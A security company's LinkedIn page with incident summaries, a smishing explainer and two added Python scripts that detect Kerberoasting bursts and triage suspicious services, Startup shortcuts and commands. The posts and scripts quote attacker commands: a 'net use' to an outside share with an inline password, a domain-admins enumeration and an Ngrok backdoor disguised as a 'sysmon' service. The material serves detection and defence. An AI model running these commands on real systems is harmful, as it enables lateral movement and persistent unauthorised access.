Huntress

Computer and Network Security

Columbia, Maryland 74,701 followers

Managed #cybersecurity without the complexity. EDR, ITDR, SIEM & SAT crafted for under-resourced IT and Security teams.

About us

Protect Your Endpoints, Identities, Logs, and Employees. The fully managed security platform that combines endpoint detection and response, Microsoft 365 identity protection, a predictably affordable SIEM and science-based security awareness training. Powered by custom-built enterprise technology for mid-market enterprises, small businesses, and the MSPs that support them and delivered by unrivaled industry analysts in our 24/7 Security Operations Center. By delivering a suite of purpose-built solutions that meet budget, security, and peace-of-mind requirements, Huntress is how the globe’s most under-resourced businesses defend against today’s cyberthreats. As long as hackers keep hacking, we keep hunting.

Industry
Computer and Network Security
Company size
501-1,000 employees
Headquarters
Columbia, Maryland
Type
Privately Held
Founded
2015
Specialties
Cyber Breach Detection, Incident Response, Endpoint Protection, Malware Analysis, and Managed Services

Updates

  • A threat actor compromised a privileged admin account to gain control of a legit Atera remote management infrastructure. From there, they pivoted across multiple organizations:
    📂 They brought their tools across by network-joining a malicious share folder: net use \\147.45.79[.]160\folder /user:drakon StronGpass@@s
    🚪 They set up an Ngrok backdoor as a Windows Service named 'sysmon': C:\programdata\ssh\nssm.exe
    🪟 They found the domain admins of the AD: C:\Windows\system32\net.exe group /domain "domain admins"
    Alongside an awesome partner, our SOC shut down the threat and kicked them out of the network. To keep your remote management infrastructure adversary-free, here are some tips:
    ✅ Tightly control account proliferation and privilege
    ✅ Allow-listing IPs of access, where possible
    ✅ Have redundancy and 'kill switches' for the worst-case scenario where your trusted RMM is compromised

  • What’s PerfMon good for? If you’re looking for #Kerberos attacks, more than you’d think 👇
    🔍 Performance Monitor (#PerfMon) counters can be used as alternative methods for detecting Kerberos roasting attacks, moving beyond traditional reliance on Windows Events 4768/4769
    😈 These counters have rich metadata that can give valuable context and seriously enhance detection capabilities
    👁️ Revisiting some ideas from a 2018 Microsoft post, it turns out PerfMon can be a great tool for keeping an eye on authentication traffic
    Read the full PerfMon analysis from Andrew Schwartz here: https://lnkd.in/dyPuNvSj
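As an added example (this is not Huntress's or Andrew Schwartz's code and is not taken from the linked analysis), the script below shows the simplest form of the idea in the post: log the KDC counters of the Security System-Wide Statistics object on a domain controller with typeperf, and flag a sampling interval whose TGS-request increment is far above the running median of earlier intervals, which is what a Kerberoasting run that requests service tickets for every SPN in one go looks like. The CSV sample is constructed (PDH-CSV layout, 10-second interval, invented numbers); the counter names, the assumption that the logged value is the raw running total, and the floor/factor thresholds are all assumptions to be checked against your own DCs. The same delta logic applied to the KDC AS Requests counter is the analogous trigger for AS-REP roasting.

```python
import csv
import io
import statistics
from datetime import datetime

# Constructed sample (invented values, not real telemetry) in the PDH-CSV layout that
# typeperf writes: column 0 is the sample timestamp, every other column is a counter
# path. Assumption: the logged value is the counter's raw running total since the KDC
# started, so the per-interval increment is what a detection has to look at.
SAMPLE_PDH_CSV = r'''"(PDH-CSV 4.0)","\\DC01\Security System-Wide Statistics\KDC AS Requests","\\DC01\Security System-Wide Statistics\KDC TGS Requests"
"02/10/2025 09:00:00.000","1000","5000"
"02/10/2025 09:00:10.000","1004","5012"
"02/10/2025 09:00:20.000","1007","5023"
"02/10/2025 09:00:30.000","1011","5037"
"02/10/2025 09:00:40.000","1013","5046"
"02/10/2025 09:00:50.000","1015","5466"
"02/10/2025 09:01:00.000","1019","5478"
"02/10/2025 09:01:10.000","1022","5491"
'''


def parse_pdh_csv(text):
    """Return a list of (timestamp, {counter_name: value}) tuples from PDH-CSV text."""
    reader = csv.reader(io.StringIO(text))
    header = next(reader)
    names = [path.rsplit("\\", 1)[-1] for path in header[1:]]  # keep only the counter name
    samples = []
    for row in reader:
        if not row:
            continue
        ts = datetime.strptime(row[0], "%m/%d/%Y %H:%M:%S.%f")
        # typeperf leaves a cell blank when the counter could not be read that interval
        values = {n: (float(v) if v.strip() else None) for n, v in zip(names, row[1:])}
        samples.append((ts, values))
    return samples


def interval_increments(samples, counter, cumulative=True):
    """Per-interval request counts. If your collector already emits a per-interval rate
    (the formatted rather than the raw counter value), pass cumulative=False."""
    if not cumulative:
        return [(ts, v[counter]) for ts, v in samples if v.get(counter) is not None]
    increments = []
    for (_, prev), (ts, cur) in zip(samples, samples[1:]):
        a, b = prev.get(counter), cur.get(counter)
        if a is None or b is None or b < a:  # gap, or counter reset after a KDC restart
            continue
        increments.append((ts, b - a))
    return increments


def flag_bursts(increments, min_history=3, factor=5.0, floor=50):
    """Flag an interval whose increment exceeds max(floor, factor * median of earlier
    intervals). The median keeps one earlier burst from inflating the baseline."""
    alerts = []
    for i, (ts, inc) in enumerate(increments):
        if i < min_history:
            continue
        baseline = statistics.median(d for _, d in increments[:i])
        threshold = max(floor, factor * baseline)
        if inc > threshold:
            alerts.append({"time": ts, "increment": inc, "baseline": baseline, "threshold": threshold})
    return alerts


def detect_roasting(text, counter="KDC TGS Requests", **thresholds):
    return flag_bursts(interval_increments(parse_pdh_csv(text), counter), **thresholds)


if __name__ == "__main__":
    for a in detect_roasting(SAMPLE_PDH_CSV):
        print(f"{a['time']:%H:%M:%S}  {a['increment']:.0f} TGS requests in one interval "
              f"(baseline {a['baseline']:.1f}, threshold {a['threshold']:.0f})")
```

The counter tells you that a burst happened, not who caused it: treat the flagged window as the time range to pull 4769 events for (many TGS requests from one client, RC4 encryption type, distinct SPNs), and tune `floor` and `factor` per DC, since a busy DC at logon time legitimately issues hundreds of service tickets per interval.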


  • Here’s why you don’t download sketchy content at work. Check this out 👇
    🎵 Someone used a free “YouTube to mp3” converter to download a song. They were served a malicious ad saying their machine had a virus and needed to download an app to fix it
    👾 The downloaded application, called "Flash Player.dmg," actually ran a bash script that installed malicious files, both as persistence items and supporting binaries
    💻 The malware also checked to see if it was running within a virtual machine
    We saw multiple behaviors from this #malware: persistence items, the commands it ran trying to evade detection, and the malicious script itself. It didn’t get very far once our SOC got tipped off to it, though.
    Want to learn more about threats like this? Stuart Ashenbrenner will be at our Huntress Roadshow in Houston on February 27. See you there: https://lnkd.in/e2_5gpDe

  • A commercial real estate company was compromised via an RMM tool 🏢
    The threat actor used their initial access to drop ANOTHER remote access tool 🤯
    They were in the process of modifying system firewall rules to gain further access and maybe even persistence via this secondary RMM tool when our SOC shut them down 🛡️
    Remember to:
    ✅ Double check your RMM tools’ permissions
    ✅ Make sure auditing is enabled—this telemetry is critical during compromise
    ✅ Educate your users on safe RMM use

  • Feeling honored to join such an amazing young woman on her big 13th! 🎂 It’s moments like this that you appreciate just how important partnerships are for the greater good—businesses but also the families behind them 🫶 Thank you Entech US for doing your part to expertly secure companies of all sizes and making sure hackers can’t gain an inch against your clients! 💪 Happy Birthday Dana! 🎉

    Shared post from Entech US:

    🏁 We are at the Rolex 24 Hours at Daytona as a guest of Huntress. They are proving once again that they don’t miss a detail - on the track or with your network. Today is Dana’s birthday, and we celebrated her milestone with a surprise cake in the garage. 🎂💙 It’s a reminder that their commitment goes beyond cybersecurity—it’s about the families and the partners they protect. Thank you, Huntress and Forte Racing, for making every lap and every moment count! 🔒 💻 🚘 🏆🔥 #Rolex24 #Huntress #Cybersecurity #ProtectWhatMatters #FamilyFirst #entechUS


  • Another day, another supply chain attack: Horizon3.ai found vulnerabilities in SimpleHelp, a popular Remote Support Software.
    ⚠️ Remote Support Software “SimpleHelp” is vulnerable to multiple CVEs that can be leveraged for full compromise.
    ⚠️ Patches were released on January 13, and CVEs were assigned on January 14.
    What to do:
    ✅ If you haven’t done so already, PATCH NOW. SimpleHelp shared instructions here: https://lnkd.in/eWbJADHt
    ✅ If you choose to uninstall, use this guidance: https://lnkd.in/eJY7peyV
    ✅ If that does not work, try "C:\ProgramData\JWrapper-Remote-Access\JWAppsSharedConfig\SimpleService.exe" Uninstall and then: sc delete "Remote Access Service"

  • Persistent threats can last a while if they’re not dealt with. Check this out 👀
    Back in 2018, a #healthcare diagnostic center had a user interact with some persistent malware. It secured footholds via:
    ➡️ A .LNK in the startup folder - c:\users\<REDACTED>\appdata\roaming\microsoft\windows\start menu\programs\startup\qvsejd.lnk
    ➡️ The .LNK would run - c:\users\<REDACTED>\appdata\roaming\mttn\bdeuisrv.exe
    ➡️ And via multiple Windows Services that ran suspicious binaries from C:\Windows—like %SystemRoot%\23783896.exe
    This #malware hung around for years—until our SOC got involved 🕵
    Huntress was installed on the affected machine on January 3, 2025 at 15:48 UTC. Within an hour, ALL the malware in question was identified and eliminated 💪
    Persistent malware is predictable. Here’s where you should check first when looking for it yourself:
    ✅ Uncommon scheduled tasks
    ✅ Users' Windows Registry Run keys
    ✅ And the Windows Start Up folder
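Two of the posts above describe artefacts that a quick host triage can catch: the Atera incident (a service named 'sysmon' whose image is nssm.exe under ProgramData, net use with a password on the command line to an outside share, enumeration of Domain Admins) and this one (a Startup-folder .lnk pointing into AppData\Roaming, services running all-digit binaries out of C:\Windows). The script below is an added example, not Huntress's code or anything taken from either incident: it runs those checks over a constructed inventory of the kind a collector would pull from the Services registry key, the per-user Startup folder and process-creation telemetry. The inventory values, the rule thresholds, the assumption that the legitimate Sysmon service image is Sysmon.exe/Sysmon64.exe in C:\Windows, and the use of 203.0.113.7 (a documentation address) as the attacker share are all assumptions; the set of "internal" ranges is hard-coded to RFC 1918 plus loopback and link-local.

```python
import ipaddress
import re
from pathlib import PureWindowsPath

# Constructed host inventory (invented values, not data from either incident): what a
# collector would pull from the Services registry key, the per-user Startup folder and
# process-creation telemetry. 203.0.113.7 is a documentation address standing in for
# an attacker-controlled SMB share.
SERVICES = [
    {"name": "sysmon",   "image": r"C:\programdata\ssh\nssm.exe"},      # wrapper posing as Sysmon
    {"name": "Sysmon64", "image": r"C:\Windows\Sysmon64.exe"},          # the real Sysmon service
    {"name": "UpdSvc",   "image": r"%SystemRoot%\23783896.exe"},        # numeric name dropped in C:\Windows
    {"name": "Spooler",  "image": r"C:\Windows\System32\spoolsv.exe"},
]
STARTUP_LINKS = [
    {"lnk": r"c:\users\alice\appdata\roaming\microsoft\windows\start menu\programs\startup\qvsejd.lnk",
     "target": r"c:\users\alice\appdata\roaming\mttn\bdeuisrv.exe"},
    {"lnk": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote.lnk",
     "target": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE"},
]
COMMAND_LINES = [
    r"net use \\203.0.113.7\folder /user:drakon StronGpass@@s",
    r"net use \\10.0.0.5\share /user:CORP\svc_backup *",
    r'C:\Windows\system32\net.exe group /domain "domain admins"',
    r"net.exe user",
]

# Assumptions encoded as rules: Sysmon's service binary is Sysmon.exe/Sysmon64.exe;
# nssm and ngrok have no business being a service image on a server; service and
# Startup binaries under user-writable trees deserve a look; only RFC 1918, loopback
# and link-local count as "internal".
IMPERSONATED = {"sysmon": {"sysmon.exe", "sysmon64.exe"}}
WRAPPERS = {"nssm.exe", "ngrok.exe"}
USER_WRITABLE = ("\\programdata\\", "\\users\\", "\\temp\\", "\\appdata\\")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
EXE_RE = re.compile(r'^"?(.+?\.exe)', re.IGNORECASE)
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\s+\\\\([^\\\s]+)\\\S*\s+/user:(\S+)\s+(\S+)", re.IGNORECASE)
DA_ENUM_RE = re.compile(r"\bnet(?:\.exe)?\s+group\b.*\bdomain admins\b", re.IGNORECASE)


def _image_exe(image):
    """Strip quotes and arguments from a service ImagePath, leaving the executable."""
    m = EXE_RE.match(image.strip())
    return m.group(1) if m else image.strip()


def check_services(services):
    findings = []
    for svc in services:
        exe = _image_exe(svc["image"])
        low, base = exe.lower(), PureWindowsPath(exe).name.lower()
        expected = IMPERSONATED.get(svc["name"].lower().removesuffix("64"))
        if base in WRAPPERS:
            findings.append(("SVC-WRAPPER-BINARY", svc["name"], exe))
        if expected and base not in expected:  # well-known name, wrong binary
            findings.append(("SVC-NAME-SPOOF", svc["name"], exe))
        if any(seg in low for seg in USER_WRITABLE):
            findings.append(("SVC-USER-WRITABLE-PATH", svc["name"], exe))
        if re.fullmatch(r"\d+\.exe", base) and ("\\windows\\" in low or "%systemroot%" in low):
            findings.append(("SVC-NUMERIC-NAME-IN-WINDOWS", svc["name"], exe))
    return findings


def check_startup(links):
    """Startup-folder shortcuts whose target lives in a user-writable tree."""
    return [("STARTUP-LNK-USER-WRITABLE", item["lnk"], item["target"])
            for item in links if any(seg in item["target"].lower() for seg in USER_WRITABLE)]


def _is_external(host):
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname needs DNS/AD context to classify; not attempted here
    return not any(addr in net for net in INTERNAL_NETS)


def check_commands(cmds):
    findings = []
    for cmd in cmds:
        m = NET_USE_RE.search(cmd)
        if m:
            host, user, secret = m.groups()
            if secret != "*":  # "*" makes net.exe prompt; anything else is a password on the command line
                findings.append(("NET-USE-INLINE-CREDENTIAL", host, f"user={user}"))
            if _is_external(host):
                findings.append(("NET-USE-EXTERNAL-SHARE", host, cmd))
        if DA_ENUM_RE.search(cmd) and "/domain" in cmd.lower():
            findings.append(("DOMAIN-ADMIN-ENUMERATION", cmd, ""))
    return findings


def triage(services=SERVICES, links=STARTUP_LINKS, cmds=COMMAND_LINES):
    """Run every check and return (rule, subject, evidence) tuples, sorted by rule."""
    return sorted(check_services(services) + check_startup(links) + check_commands(cmds))


if __name__ == "__main__":
    for rule, subject, evidence in triage():
        print(f"{rule:30} {subject}  {evidence}")
```

These are triage rules, not verdicts: plenty of legitimate software puts a Startup shortcut into AppData, so the output is a list to look at, ordered by rule, with the service-name spoof and the inline credential to an outside share being the two findings that should go to the top of the queue. Scheduled tasks and the Run keys from the checklist above would plug into the same user-writable-path check once a collector feeds them in.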

  • Here’s how text scams go down 👇
    📲 You get a text claiming there’s an issue with your USPS shipment.
    📱 But the number has an international country code, yet it’s referencing USPS.
    🔗 The link’s not clickable, but the message says replying will fix that.
    But here’s what happens if you reply:
    ✅ The link’s suddenly clickable and leads to a fake USPS site.
    ✅ Your number gets flagged as active, increasing scam texts.
    ✅ The scammers improve their chances of tricking others.
    Delete the message. Don’t interact. Learn how to spot these scams in the Huntress LinkedIn Newsletter

    Newsletter: Exploring Package Tracking Smishing Scams (Huntress on LinkedIn)


  • 🔍 In late 2024, we spotted some suspicious activity across multiple Canadian organizations pointing to RedCurl, an APT group with a history of cyber espionage.
    🕵️♀️ This wasn’t new—RedCurl’s been active since at least November 2023:
    👻 They don’t encrypt systems, steal money, or demand ransoms. Instead, they hide for months, quietly stealing emails, corporate docs, and confidential files.
    🌴 They target industries like wholesale retail, finance, tourism, insurance, construction, and consulting.
    We’ve been working to break down RedCurl’s unique tactics, show how they match past attacks, and share tips on spotting similar threats—from any adversary.
    Read the analysis from Greg Linares, Matt A., and Alden Schmidt here: https://lnkd.in/eJ45bpzB
